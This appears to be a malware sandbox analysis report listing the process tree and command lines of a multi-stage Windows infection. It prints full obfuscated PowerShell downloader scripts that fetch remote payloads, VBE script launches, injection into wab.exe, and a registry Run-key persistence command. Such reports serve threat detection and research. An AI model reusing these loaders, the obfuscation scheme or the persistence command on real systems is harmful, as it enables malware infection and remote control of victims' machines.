PID 4852 wrote to memory of 1880	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 4852 wrote to memory of 1880	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 4852 wrote to memory of 1880	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 4852 wrote to memory of 1880	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 1880 wrote to memory of 2684	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\cmd.exe
PID 1880 wrote to memory of 2684	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\cmd.exe
PID 1880 wrote to memory of 2684	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3800	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 3800	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\reg.exe
PID 2684 wrote to memory of 3800	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\reg.exe
PID 3196 wrote to memory of 3520	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 3196 wrote to memory of 3520	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 3196 wrote to memory of 3520	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 3196 wrote to memory of 3520	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 3196 wrote to memory of 3520	N/A	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe	C:\Program Files (x86)\windows mail\wab.exe
PID 1880 wrote to memory of 3064	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 3064	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 3064	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 4636	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 4636	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 4636	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 5188	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 5188	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 1880 wrote to memory of 5188	N/A	C:\Program Files (x86)\windows mail\wab.exe	C:\Windows\SysWOW64\WScript.exe
PID 3064 wrote to memory of 4852	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 4852	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 4852	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4636 wrote to memory of 4364	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4636 wrote to memory of 4364	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4636 wrote to memory of 4364	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5188 wrote to memory of 3756	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5188 wrote to memory of 3756	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5188 wrote to memory of 3756	N/A	C:\Windows\SysWOW64\WScript.exe	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3756 wrote to memory of 2132	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 3756 wrote to memory of 2132	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 3756 wrote to memory of 2132	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 4352	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 4352	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 4352	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe

"C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aevjqb.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sorbet.Unb && echo t"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\mewops.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firhjulede47='Sub';$Firhjulede47+='strin';$Lnarbejderne = 1;$Firhjulede47+='g';Function Cremerne($Barnefaderens){$Regretfully177=$Barnefaderens.Length-$Lnarbejderne;For($Oreodontine=5;$Oreodontine -lt $Regretfully177;$Oreodontine+=6){$Nazeranna+=$Barnefaderens.$Firhjulede47.Invoke( $Oreodontine, $Lnarbejderne);}$Nazeranna;}function belejlige($Foreleg){. ($omdiskuteret) ($Foreleg);}$Krmmerhuse=Cremerne ' MiniMAgoraoTuri zPressiFore lSerinlbino.ae ang/Macro5Worde.Mulig0Decri Nynaz(GuttuWSamlei S.iknpse dd Li,eoSubjewHrerssSente Str.NSalgsTAd.pr M,ni1Subfi0 Bibe.Bourr0Mo,ig;Lderb .redeW PostiAarrinKaram6multi4 hand; At,a draxsving6 S,il4Shahp;Duppe LazarrShellvS leh:Blesa1Friha2Co,nb1Socia.Syste0Risen)Tearj EntopGGlas.eHo decReex.k CalaoHelta/Tille2Sl un0Emehv1I ddr0Unwin0Menom1Illim0 Anti1Desub FormaFAnhydiEks rrSk,ideRv.skfAppreoUdpinx.eter/flids1Tandb2Lejer1Slave.Blama0Cykli ';$Insectival=Cremerne ' BeatU DennsN tideTeksbrmicro- etlaAWhinig b.gneGrinenBibelt Gast ';$fairylike=Cremerne 'BrusehOn netScur,tGan ep Amats Leth:Ortyg/ Lo a/SuperjUnmanoInfikcRensecF,ertuHex npVirknaMatert,ycamiForhaoDahoonTankeaOpkallo.tvis eronc erfoiBeckseilen,n YnglcInrigePreli.Svineotho wrKontogPassa/ iolezPaddlaFinanrH.lpeaEmbai/PragtGFarvelPunchoTilremFordmeBoligr overuPatril Stomi.ortatprideiStrygsChymi.HemmedKra leMinimpTur,ylIslamoArchayDicki ';$Thage=Cremerne 'Unfri>.liss ';$omdiskuteret=Cremerne ' dpegi CutaeBetj,x ddit ';$Tattie='Udbredelsesomraader';$Flovserne = Cremerne 'UnmeleCompacDitikhUds.roGenin Toeli%DunhiaConcepTillipchalcdFoderabil.etUranoaBrand%Invo,\Rhi oSUmulioFolkerOversbSkdese Men.tBabel.D.limUBlocknParadbBruge Half&Pingu&Uindb .hirteCon icFednihGandeoCant OghatOprin ';belejlige (Cremerne ' Krav$ Hopeg akalIncl.opes,ibKlkniaNonsilSiren:DrakbpUsikkrHyperoToelivDmoneoS,rukkGamina HypetSt derSha e=Areng(sherecRiotem BelvdPr va Disk/StenfcKo,ge ,ocki$ElektFChr,mlNsehooDebowvFaradsAssi,eC orerSka,tnI,ddreOvers) Prof ');belejlige (Cremerne ' Ste,$Slv,ng .epalKl edoArranbImagoaRefutlEpigr:Ska lS Ch,rttmm.racyanoi .fferHematcaubepaSqua sBaskeeUdsyrsgu.ra=Produ$DibblfBesn.aReil.iNoninrPauliyB,somlBrig i.uropkTappee,enzi. tags Ta.rp,nhaulSwathiVernot orig(Cruel$ SpalTTabelhSipsba.vedjgKniveeRitua)Missi ');$fairylike=$Staircases[0];$bestyrelsesreferaterne= (Cremerne 'Dekl,$hjlp.gUnpeclUdkmpoDe erb uperaFo.vilSyn.s:Fa.ceUTopfonFlan c,tartuCava r .olibMe.th=CyrilNFlj,reOospowJirin-DisanOMitogbU.derjGtraneKilotcdam.rtDi.ta ResiS S.ovyPostisUnsugtPreabeFjerdm.karl. orbeN In lePr.rotBorgm.Cod,rW ImpeeH llibSelskCUn.erlI,variKrakeeBlindnA erat');$bestyrelsesreferaterne+=$provokatr[1];belejlige ($bestyrelsesreferaterne);belejlige (Cremerne 'resun$preamUElectn ParecScrapuTillgr evisbPerso..nderHSammee Hud,a No.cd .ilje TiccrBl,nisMorsi[afspn$NonfuIbaladnExtrasImpoveTranscEftert.largiRecanvUndera BrullWri.t]styrt=Bagst$De.isKOparerSpiramGolasmAllokeHektorPrebih VoicuAnnu.sUdrugePers ');$Nykkes=Cremerne 'Sandg$KbtesUPreponJaloucBew au BogbrRecitbpharm.Loai DNdl.noMediawBekennSem el.ngoroMolybaBrigadUd,ryF.luigi NarklAmpaneOverf( unmi$R klafHelioaRein,iFosforFarray seholm.spui T.lsk,oursexerog,L,opo$ krifgHauntl parao embebSubdoaProsplO lysiVampesUds.raEpilat FootiDatoloParaln Emp,sEkvip) Sla, ';$globalisations=$provokatr[0];belejlige (Cremerne '.aris$Sceneg S btlLrerkoF.yvebNormaaMo,gelBind,:GravsbPensieNorm,lGibboiChlorz Retoe SorgrUdhvne ldri=Varme(AlurrTIndfaeGallis CoactBl as-Su,alPHamesaUndert AffrhFe,lb Tidsg$ MosagRevinlIntraoEfterbIoni.aCallelForbriM rtgsS.abha Derit aabsiCon ioFaithnJadeisGaffe)S.rot ');while (!$belizere) {belejlige (Cremerne ' .and$TubipgMeaselPopulo Sy,tbAto,laDig,al Va.n: biscCG leroC anhnLang fEdgebi Kj sdErythe BhunrBrn k=Frbid$Coupat Chror Re,ouNivaleHet,r ') ;belejlige $Nykkes;belejlige (Cremerne 'InterSHomontplaceaVi.rarGara,t ,ett-AandeS TyktlSkaereF.rileDefinpRaffi H,gbu4Shall ');belejlige (Cremerne ',irak$RecabgPreeplB,ainoEmig b.nteraDre,alUnscu:Inds,bWareseR ceplAlb,niBlattzAlumieSc,olr gen.eBucol= St,r(K,loaTFljteeB,yggsAvoditPillo-MultiPFrydea AmagtCyanshbruge Torta$NondegTa ajlSt.neoUns,sbBr,ncamangal dleji Pa esShaf,aAletatTvegei Ad ioHer.tn TilmsRes,s)Kaste ') ;belejlige (Cremerne 'Toyli$ TwadgUngo.lbeg eoPhlo,b DiffaSik elEne.g:Race oAgterpterris ForslFolkeaLocutaTime =Pala.$FotoggAnanalkedeloScenebMoab aArvellInver:P.ecoJMeno uSin,sbbl.tti Protlmis,auPurlimM ljtsGurramBl,dtiMogv,dDrumbdTyndeas,enegReligeRegrenDrepasUopmr+Butik+Ackno% kern$Mch,gSChryst,idegaEmanuiMankirBerascopstrask.drs UdtreGavnls Syst.Nicolc.armkoKura,uAl trnrekurt Suff ') ;$fairylike=$Staircases[$opslaa];}$skriftsnit=294679;$Pomeransskal=27677;belejlige (Cremerne 'Rinki$Funktg BuntlHoldioPudibbNum,ea Di plLevem:SilicVAppanaArbe,g Partt arsm hirdeStaklsSkomatUnadje sller Atri ema=Overg eimbGudtyderichmt harr-BromoC Ka aoImprinWandltU.ganeLuf knVi totTidsp For.n$Unde.g Bed,lConfioRe,edbSubliaTagenlMa keiRgte ssel.maOphictPreceiInigooH.lshnEnkels Tres ');belejlige (Cremerne 'Uigen$UlkengSt erlE.hveoVeks.bNemala Supel tolt: MennRT iche C.unfDiagoe Spart Astre orr Aechm=Flags Megap[Kupo.S arjoyMondes PristTermieDeplam .lad.WiltoCKultuoReb unImprev.ykkeeTfteerDysfutCoshe]Comps:Sansc:unbu FTimefrMundioI framDomi BUngyra Indfs Fluoe Dism6Peach4umrkeSLikv tLandgrLo,taiorgannFlad gTamme(.arad$RundkVEneinaW,orrg TotatBlaasm oykoeSwazis,hrontRegraege dir kste)Anal. ');belejlige (Cremerne 'Lnest$TrumpgCaraml.roncoPervebDagg,aOrdkllAfrej:BrnefUPesosnEr kkeGrovexhypobpSupereIngegd Fli,iBeaujeTovrenTimort ArkflValgpyHofde3produ Chole= Pla, .inis[ReestSMona,yOverss ioskt SysseSkjtemUland.GoliaTGritteLept.xPap,rtTe,tl. TilbEConvenBatinccalopoPygmydWart,i RestnCrategVampe]Vagst: Epis:TyranAUrethSTotalC BrobI iogrI Nonp. TegnGUd,tae dekatAdenaS UnbutSigjnrHypofiSubsenPraksgGrusg(Fo.ko$lingbRBimeteHyperf FrndeAkadetSkamseErkla)Malis ');belejlige (Cremerne ' Moto$ShawlgCon alP ndioOpiumbKorthaPy.nilSitti:Mome UGdninntriakc,nnemeFlovmrSrilatT,gheiTudehfKandiiL mpwaalkydbStandlLotuseHulkolBlselyUndew=In us$ungagUSpinknThaiseCineaxhyre.pUdpoleO.ervdinteli Arrhe Dek.nLatentD.apelAstroy Ran 3stuep.SymptsPiezouFeateb TangsMickyt Satar LongiEnf.en D.neginvol(Phila$StedssDelmnkDeli,r ClamiAc nefbundstKultusFormun LazaiTes.etPensi,Bling$slgtsP FingoBrudemskelseFr.garPr,poaComp,nK leys StersPicomkL assa OptalVi.ef)Micro ');belejlige $Uncertifiablely;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sorbet.Unb && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sawneb='Sub';$Sawneb+='strin';$Delfinarium97 = 1;$Sawneb+='g';Function nosologies($Presignify){$Elvrksarbejdere=$Presignify.Length-$Delfinarium97;For($Ludbehandlendes=5;$Ludbehandlendes -lt $Elvrksarbejdere;$Ludbehandlendes+=6){$Kombifilter+=$Presignify.$Sawneb.Invoke( $Ludbehandlendes, $Delfinarium97);}$Kombifilter;}function Lrerkollegierne($Pingvinernes){. ($Nabosprog) ($Pingvinernes);}$Autotelic105=nosologies ' PseuMPalomostvnizJehjdiDysphl TofalRegneaDisp,/Perip5Lysso.Ran.a0Subu. Drill(UdlejWNajeriFrokonPrkend Phleo ommuwStyllsParkg gn toNL.ditT Lava Casa1forfr0 Urre.Unlac0glend;Gloss EpsilWpig.biFormknApiol6Sakka4,ntro;Adorn UstabxEstim6Antir4S.orh; Gums GenbrrTransv Net.:Twop 1 Psa,2Lands1Virks.Beb.e0Nonex) Adol AcquiGDepope ou.pcReorik UvejoTjrin/Moral2Blast0Overf1Bogen0ha,mo0.rsal1,teuc0Skraa1Subci skravFNidiniCar.arNdrineEnamsfMelanoNordexSe ti/Zygad1Hydro2 B un1 Bej,.B.der0 Apht ';$uninoculable=nosologies 'JoyceU Sk fsWas,ieSkindrWodge-AntheApostpgEle teQuavinSejt,tPer,t ';$kammermusikken=nosologies ' SpechSammetLivestMaarep CarisFjerk: Acar/Aer,g/unifot KoncaskabetTrontspaafueNorthl Ta.feEntrec ncurt.anutrTransorin,onInstai InkocOu,susBaade. ncoucKongeoUnbur.ContizO,tflwTabul/Br,basStavndRegel/Un,erTVelr r Speco SerpmSpeaklUnreteAnginrMilhaeAandlv ImmeoSdc.llSubprvCoxaleSocierNondeeH,lmlsViole.HundrctelessBa.ebvManu ';$Roomette=nosologies 'U der>Sakk. ';$Nabosprog=nosologies 'In,ohi PorpePleurx Cess ';$Fldebollernes='osteomatoid';$Forborne = nosologies 'PerosePlanlcNoctih .namotorn, M.us%MilieaFortrp ourbpArmozdSammea VagttBor.tama,eg%Tilpl\FondsIHovednSucc,dununit MoneaEastes.useutApiosnPrferiAekvinFarc,gsvinge VivirGe.tunWateres ripsHersk.a tioV De.aoDivisiS.xmi Retra& Tave& wolf Landse Disccrungeh k rmo,enop SarditNoedv ';Lrerkollegierne (nosologies 'Overh$SoldagSt,ealNiggloAc.rebSits aVesi.lmonot:PygalCArealiCorrit,okolrCel.doErstan B rtmTilpleImmanlFondeiAnmrksAdiposChakoe F llnCongr=Koers(.lkalcMyttemOpfredTre t Teleg/ UngkcN nas Pr.re$UnderFE.plioAkt orTyrosb .isuoPlanlrHete.nUdueleA.oli)Sters ');Lrerkollegierne (nosologies 'galge$H lhegTriadlKee,aoS.bmab Su eaJenlgl Pure:Stvs,F DolkiSn,reg Pe,pu Antir litulTrofuiIn stgSpro,tFulds=Kaffe$UnthrkVversaM.kromMuddemSi,kee RumfrOpbevmBevbnuSameksFdep.i.erkokCymrik KataeTransnm,tal.,edgisPhotopForkylPhariibrynjtIndse(ammon$ InddRBou,co Overo Sp,lm E.ineU.iastAlt,rtPhonoe hund)Proce ');$kammermusikken=$Figurligt[0];$Billedhugger= (nosologies 'Espen$Troubg rtygl fvejoEff cb CabuaTrofflLacte:IndvaB OutsaSnvler PreaiPr.colD ivalOve.paBrndp=BretwN omlseBenedw.arak- .tarOBra.nb tancjHoodle Boatc Un etStuds rupSTaaley Eks s TonattowereSprinm D ff.M.nelN Tinge S.iltTilsp. GesaWUdlaaeMa hibB.rupCLejlillageriLeveleMinernAss rt');$Billedhugger+=$Citronmelissen[1];Lrerkollegierne ($Billedhugger);Lrerkollegierne (nosologies 'Skr,t$CuriuB FlipaPanderBubaliCavialKo belBlussa,itho.StrneHP,ecueStu,eathorod.verpeFe.ltr.aleosblens[Inter$Cyke,uKnibtnStdtviGn,tonMaralo.accac GriluHenr.l Lo.aa xsebs vbol bsceeChan,]K.nfe=Serra$Bo,siARe,rguOverstPsychoBagflt HampeAdminlbudgeiI,ealcGate,1Cup.e0Havar5 Enta ');$Gentlemanliness=nosologies ' Spor$AuricBSold,a G,ckrS oroiLachrlCitatlInteraFrem,. ErhvDModeroSkaktwS.lfonDouchlLol hoKelpsaEpiled n,nlF popkiMarmolUnmumeAntim(Disin$Tipsfk ,neqaWavenmUbeskmDyreheSv,gerTroldmBetalu ukas b,roi DrookA komk,ordoeErstan,onre,Grund$Myr hRSku de ,staeShabbcGuarnhImporoTro s)Dolkt ';$Reecho=$Citronmelissen[0];Lrerkollegierne (nosologies ' Uden$G,stugFodrilStadsoForsybAfst,aDrosllCapuc:UnsubNTurnoycensubPrecorImmatu Redod KarldVoldeeOcclunSysteeDeuto1L,ach3 Morp2Pheny= D kk( FaasTHoroseCaceisMiasmt ppro- eellPFanmaaCionitStillhAmano uram $FikssRArthreBybuselysvacHete,hEuro,o.efra) Ende ');while (!$Nybruddene132) {Lrerkollegierne (nosologies 'Nvenp$Miilig,ostslRu.eio Uns bIndmaa P.ptlPr.ve:OutbrWhydr,e SerisBrutts Tur eImparlAnden=Nonse$Aftegt FluerGn llu biaueS,rve ') ;Lrerkollegierne $Gentlemanliness;Lrerkollegierne (nosologies 'SkovbSSemimtForpaaPosserAp,mitTuber-DemagSStegolOveroeHetereMelonpNrved mai.f4Notat ');Lrerkollegierne (nosologies 'Misba$Emb lg nlilVelf oTr.vrbKonfeaAyahalWorsh:NonsuNMaskiyTarifbtrapprS nituEpicodHukkedBarnae LandnChroneMo.or1 P nk3 pock2 Lata=genn ( trilTFlosneSekr sFremvtAte o-SlrinPDossyaA.teetRegiohGa.eo A tio$ Sa,iRLach,eS ileeMisapcGomuthSociooEst,b)Bo,tl ') ;Lrerkollegierne (nosologies 'Depor$D mingBa dul PereoEksp,bTeknoa Menol Ekse:divinAK.ndikFolket SkuliRenseeBrn,taMangfvo,tthaRe,ivnOblonc QuineSniver UnadnTapeteUngli=Absol$ eazgSoloslForsvoVis.abMikkiaPredolElmie:AphesI rdgrnMikelv,ssoci BlactBroddeLaina+Febru+ ,erl% Opla$OrdreFtilbyiM.ltigHandeuPrecorversalB.arbiSp,ydgBaventHe.al. Skruc.manuoCoosiuRefu nEtiketC mot ') ;$kammermusikken=$Figurligt[$Aktieavancerne];}$unembowered=292446;$Nonprosperously=29824;Lrerkollegierne (nosologies ' ,ilj$Antiig N nmlSpanco urtib.rvyeaIndtelFrute: ToxiDZerotiHy.rof T.aitBenmeoRifisnUnt egFortheLitzir K ureOrdre ,kuau=Dry,t conciG Unsue osehtEn.ou-CatecCKalveoiso onAnsart StaveaxtrenFlumatbimas ribo$VrktjRRealkeUnf.meFlidec EksthAmlonoSpi.e ');Lrerkollegierne (nosologies ' Ste.$Ly,regAdmitl Chaso WaulbMyeloa.eroslSjals:C,rcuB,rdeieS aresDrfyliLoesngSprydtHenaaiWelshgPaadmePanthlSyntosLirate Nrahn Bhag Trekv=Klode Skues[ CoccSCarpoyS,onss crimtAmalgeFreebmCurso.PhotoCPrio oFrisrnVandkvStrane K itr UnwrtEldor]S ile: O.ci:SuperFstykerLydbgoSmalnmRe.raBNachgaTynd s,uleeeKa.ed6lus e4SemidSPe get anc,r TheriNewfonFilifgRaadh(Pa an$RecarDMicroiAf,oefSystetAfsteoDiplon ForbgMinareI.perrBeatgeVelve)Asbes ');Lrerkollegierne (nosologies 'Snigm$AfvangLute.lCrayoo .verb MuleaG amolBar.e:Lyse.CSco,ehVipsteBroenmDusiniRapa lTraceurappem SalgiBrevsnNonaueFry.ssForurc EngreD quen heetUnwar Reseq=Lapp Incit[ StedSBlodpyPrimesPle,etSyllaeRamarmAutom.cor eTMoraleAc.uaxNo cotA.jud.PurliECel,in tabec .ormo tru.ddeteriHindrn velsgUnton]Velig:Zelin:Rast,AExpatS BetoCDacr ITackiIBrnek. RecoG F lseAlloct asteS PlagtMilitrMerkaiJernanWeedlg Ove.( Eval$EnlayBLandoeParafs Volci HjemgWit.ot SteliS.inggrenteeUhenslStudisF,mbreNoternBesyn)Vascu ');Lrerkollegierne (nosologies 'arrak$ YellgStonelBrainovr,epb DanmaSto el Klip: K.ltSCalcatUige.aW oretVinkooJensps tr,cpThorno BromrTon.ae .vad=Waste$,iannCSkrmth,onsueryghvmIndskiThalalbryggu ompumThuriiTrietn LongeIndflsprestc,lmaheHermenMusdot Bahr.frugtsHypoauDeflab ChapsInfortApicir Hus,idispinOrddegParab(Efte.$ SpiruUnbefnDiscre HypemConsib.andloNonpawDampnef,rmar,ithyeKommedUford, siem$piperNForm oAfp,vnBuc,fpThonfr WintogrievsPopulp ElfleUndusrForldo CanouPsykos sen lInddayUdskr)Regas ');Lrerkollegierne $Statospore;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%ambuscades% -w 1 $Quantized202=(Get-ItemProperty -Path 'HKCU:\Nordmanden\').Guldstole;%ambuscades% ($Quantized202)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%ambuscades% -w 1 $Quantized202=(Get-ItemProperty -Path 'HKCU:\Nordmanden\').Guldstole;%ambuscades% ($Quantized202)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\zcbvbq.vbs"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\phjyzq.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\oxtyxn.vbe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Siccimeter = 1;$Wattmetre='Su';$Wattmetre+='bstrin';$Wattmetre+='g';Function Alethoscope71($Drmmeanalysernes){$Corsage=$Drmmeanalysernes.Length-$Siccimeter;For($Falsummer=5;$Falsummer -lt $Corsage;$Falsummer+=6){$Imperalistiske+=$Drmmeanalysernes.$Wattmetre.Invoke( $Falsummer, $Siccimeter);}$Imperalistiske;}function zabra($Overproportion){& ($Myrdedes) ($Overproportion);}$Eneanpartshavernes=Alethoscope71 'FormiM Af.aoNattez,ndusiL.ffalAvan l MascaMoent/Sknhe5 Avol.,lmue0backs Sch.s(M teoW Hamfi Auton Uns,dFl.oro CentwGenins Mon. klunsN PoteTPoste Ca.t1Limbe0 itri.Biobi0Ra,df;lini. BlikvWStu.ei Be.rn illm6 Euf,4Sq.ir;T,der Quifx anti6pro.i4Karkl; Inte PrsumrDetecvFyld.:Cacci1 Stag2 ,iss1O.era.Eutr 0Studi)Pseud ,nklaGAse aeTranqcDipalkThorvo Sikk/Ungua2Ydmy.0Unmon1Eurov0 Sylv0Cirku1.udde0Disse1Unmem For dFInteriredigrKunsteStdvif BegaoGast x Genn/P.lst1Spill2.othe1Grube.,rogl0 samm ';$Disaccharidase=Alethoscope71 'oprusUSupersElenieVrelsrVeinw-Ef,erAVintegjuri,ezeb.anDissttHalvs ';$Gennemblades=Alethoscope71 'ska,th VicetDebatt.aarepFrdses.ager:Oppr,/V.ola/ ysiuwRekrewFlagrw Unin.,emissLivske ForrnServodUndubs OverpDomi,aSkrkkcElecte Dubl.Forf,cC mpeoVankemTra.s/ Fo,kpDyr er.morooSub,e/ BistdFatesl Symp/HavbiaNonopz CatakBogbijMonadmGra,ifDjvle ';$Bedstevenners=Alethoscope71 'Swash> hyro ';$Myrdedes=Alethoscope71 'BedcoiCompreFeminxServa ';$Renteflsomme='Superjudicial175';zabra (Alethoscope71 'FotomSM ifeeEndomtMatfe- OverCPirogoData n Hao,tJuleaeUdmntnClau tTrldo Unnat-,pkalPCa.dia HingtGoddeh Impa IntelTFri r:maelk\NavneR PastuW.relsBefritBl.esi,meltcP,rveaQua.itMarkio DuscrAngor.Br.set StevxIntertvandf Amfi-Ho blV GaleaV,ljel JunguOfftreKarte Ri al$Tra kRAlkaleUf ldnGipsetL ndeeTils,fAtmialO tplsAutomoG,nnemorddemTi,everot t;Ne.ri ');zabra (Alethoscope71 'unpariSwayef Wamu schem(L.ramtWirepeHypsos Sammt,sfor-IcierpToranaOsseotVideohHeadl HiemaTP,ila:Evang\L dskRCircuuSubresBannet StoniTropic,oenta BandtRicksoFolk.rN.hil..eclitC cloxHamalt Cope) Leve{ OrnaeAmortxTar.aiLineatP rri} Pott; R ma ');$Informationsmaengder = Alethoscope71 'JuleseSerpecProtohOutgroFader Serap%Genfra UnivpDarbhp ,amadF rtoaRefortderriaCoact%Phosp\.ronuiAlgols Sym.oFor.ilHerreiMong nSnoreo LefllSpu seOv.rsn Lyg iBekk,c ivsb. TranO Jap vS,rumeOppus Sap n&Pasi,&Under Miljme P.loc HydrhHe.ocoAgter Calin$Sterl ';zabra (Alethoscope71 'Gifte$ Affig,anagl,ubapo.nwrabAmbita CykllKonst:RessoG ranrS.aaruIstann f ysdStepcmF raguSkrumr,nifie Om,ln ypoce,onsts,arie= Bouc(Sr,lac nstimStaklduns,c Bagg/ BouncDeis Samm$JeppeI stornKartefcalcioTil,grArsenmSkiftaSymb tRegnsiAfko ouddran Torbs Cashm p tiaShoddeTimotnKvintgsubduddiamie Hum.rAchiy) Farm ');zabra (Alethoscope71 'H ssa$OutcagovertlUnunaoN,nfob RailaP.litlBifen: NontFStep.oSpectrengrau Afgar.onceeVernanBn,haeWrastnPseuddAf,oleKapu,=Parae$ nalGLeucieStammn,dtalnR ordeBomrkmIn robAntholSlo pa.ulindHi.dreHumansFirs,.Rekurs NongpGun ylCongriStrejtElect(Mumps$EfterBst tieTupi,dNedt sWestmt .vere My ev RecoeKniv,n ElsknRectoeDragorVirkesSlimp)D.flj ');$Gennemblades=$Forurenende[0];zabra (Alethoscope71 'B.rts$MacbegNonfulMultioNy.rubGurura .umplTo ga:MasteZ .ncui NonhsSkrvik Ve.iaStvne=JakfrNPareneGrundwBlomk-DroluOtelttbBeastjLignieK adrcVariatUnpop K 